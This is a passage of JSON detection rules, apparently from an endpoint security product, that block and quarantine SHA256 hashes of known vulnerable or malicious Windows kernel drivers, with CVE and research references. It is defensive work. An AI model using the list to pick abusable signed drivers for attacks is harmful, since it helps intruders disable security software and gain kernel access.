+ "id": "c7d40069-2da6-5e1d-94fe-8303eace72bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488379Z", + "creation_date": "2026-03-23T11:45:31.488381Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2843834ebfd4c0bc906b90a2f8be6e2b0ced788b8a26296536bcaa8be9ee132f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7db2e31-63dd-52ea-9063-4a214a529482", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608282Z", + "creation_date": "2026-03-23T11:45:29.608284Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7281a3b0fa9a17b45fb5f2b6ab31e521495a524ad040dfe5591394952a8d5c81", + "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7dcdc0b-135a-5f74-968b-701d76ab3af4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145272Z", + "creation_date": "2026-03-23T11:45:31.145274Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145279Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34028d77b89865fca9790769f3f2e8feabd3be85d905ce4abd3f57b1b72561e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7e1bc65-5161-5f0e-82ce-6c50ad5f2c7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973637Z", + "creation_date": "2026-03-23T11:45:29.973638Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973644Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e37592a2a415f520438330c32cfbdbd6af594deef5290b2fa4b9722b898ff69", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7e9a127-fbf0-513c-9931-eaa843568bbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818434Z", + "creation_date": "2026-03-23T11:45:30.818436Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818441Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d3b5fd13a53eee5c468c8bfde4bfa7b968c761f9b781bb80ccd5637ee052ee7d", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7f4d28b-0ff5-57e9-9251-25d24d17dba7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152185Z", + "creation_date": "2026-03-23T11:45:31.152188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152196Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25b6f65c07b83293958c6f1e36d053b1d39c5dde864fde5cfc1834ecca591139", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7f53393-3aff-5801-9092-1271c2a54d08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820124Z", + "creation_date": "2026-03-23T11:45:30.820126Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820131Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14a0a9fe317192b54fda1516f46af78e6aabac0cf050bf18ec1e5ddaefd8e051", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8097ad6-8b0b-5aea-87fd-975054f83666", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828112Z", + "creation_date": "2026-03-23T11:45:31.828115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd3b251ac86c22d91ab802841869285776c07e1d51c8b813e1538a3875396e12", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c80b8259-83ab-54da-ab5b-22a088c4ed4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969238Z", + "creation_date": "2026-03-23T11:45:29.969241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969246Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a5a50449e2cc4d0dbc80496f757935ae38bf8a1bebdd6555a3495d8c219df2ad", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c80e7c1a-7902-5fb3-a4b2-9afea19044f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823731Z", + "creation_date": "2026-03-23T11:45:31.823733Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823739Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "303f52270ee7b8c4e3c2256e7d3710004f8dc6a753fa0ec9d7aadf863e91f171", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c816e426-59a8-5b52-a894-046f53b0e987", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823626Z", + "creation_date": "2026-03-23T11:45:30.823628Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823634Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a423b34233d44c6ca5f2e33aa47e645dc431c71a642e0b0b40f2f2f0d48e8198", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"c81c2ce1-fabd-5d52-af0f-f4a23bdd58b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834668Z", + "creation_date": "2026-03-23T11:45:30.834672Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "756388618fb0ac8c172bc08ab17bbfaece56a980f70ab4cd60a65ca1488b1799", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c824b544-8a10-52ad-b8fa-955ac0b3f9cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818962Z", + "creation_date": "2026-03-23T11:45:31.818965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.818974Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd9da6db9c9ab066e44cc1653ad2bf817492850afd95b838df7f19b92254a5a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c82be96f-332a-50e7-a1c2-0dbdbbd9d436", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819602Z", + "creation_date": "2026-03-23T11:45:30.819604Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8321471be85dc8a67ac18a2460cab50e7c41cb47252f9a7278b1e69d6970f25", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c84d262a-aba9-517d-834b-e2c8cbcb40ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160221Z", + "creation_date": "2026-03-23T11:45:31.160223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8aec725fe23677aad785a819400da5c2bc8436804a965a256806ff6e37bb19d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8521409-d970-5d97-90e8-eaf88d7fe442", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827212Z", + "creation_date": "2026-03-23T11:45:31.827214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827223Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "26dde0eacfe6d99cd59ccb6e47597c9765489e30ecf9a27ea0be023fc31b019e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c854a0fb-9a3d-5639-8af9-fd3856fd379d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617024Z", + "creation_date": "2026-03-23T11:45:29.617026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617031Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5167b33a95b4db0a1244cb3b95d4024587d9a5a95222babb033210e6b111d2fb", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c858192d-5477-5358-8aff-c3bacbc6085a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489230Z", + "creation_date": "2026-03-23T11:45:31.489232Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489239Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7626cbd757986a641705d133823994b458a16d7e93901e3bef15b4ce6cb54be2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8632ad8-a407-5905-bafe-1f547c817fca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143615Z", + "creation_date": "2026-03-23T11:45:31.143617Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143622Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e88d6d62ec6d4ee772fabb2d5bf4844cf55c6a1d87db692ad30a9660089d96d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c86c1719-503b-5865-bd8c-bc16a9fd2304", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978066Z", + "creation_date": "2026-03-23T11:45:29.978068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978074Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c", + "comment": "Malicious Kernel Driver (aka ntbios_2.sys) [https://www.loldrivers.io/drivers/33a9c9ae-5ca3-442d-9f0f-2615637c1c57/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c87ce225-1ba6-53d5-b2f9-9cb59581830a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609719Z", + "creation_date": 
"2026-03-23T11:45:29.609721Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609726Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e88cb80328c3dbaa2752591692e74a2fae7e146d7d8aabc9b9ac9a6fe561e6c", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c898de3c-fba8-5115-9959-88940ccb0e1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497510Z", + "creation_date": "2026-03-23T11:45:31.497513Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c9932bb8d070f8ee18b54607ad25d347e9a5464bbf46f128be30e5126b5b8ed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"c8a60329-a39a-512b-b1b7-cb4b238fc7e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485417Z", + "creation_date": "2026-03-23T11:45:31.485421Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485431Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "188ee7fda1d997b4390bfda1c2fc173d5eb6f1a47865a9e0ca62807a7405ebb2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8a6cde7-d099-5f90-9837-f5af874a1526", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454565Z", + "creation_date": "2026-03-23T11:45:30.454568Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.454577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15d44fa77f8d922b5cf03425116c394eefc20ae9a082d3d7f10e68b832be36e7", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c8a8c418-975f-5daf-9e55-320b76eb97ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983981Z", + "creation_date": "2026-03-23T11:45:29.983983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, 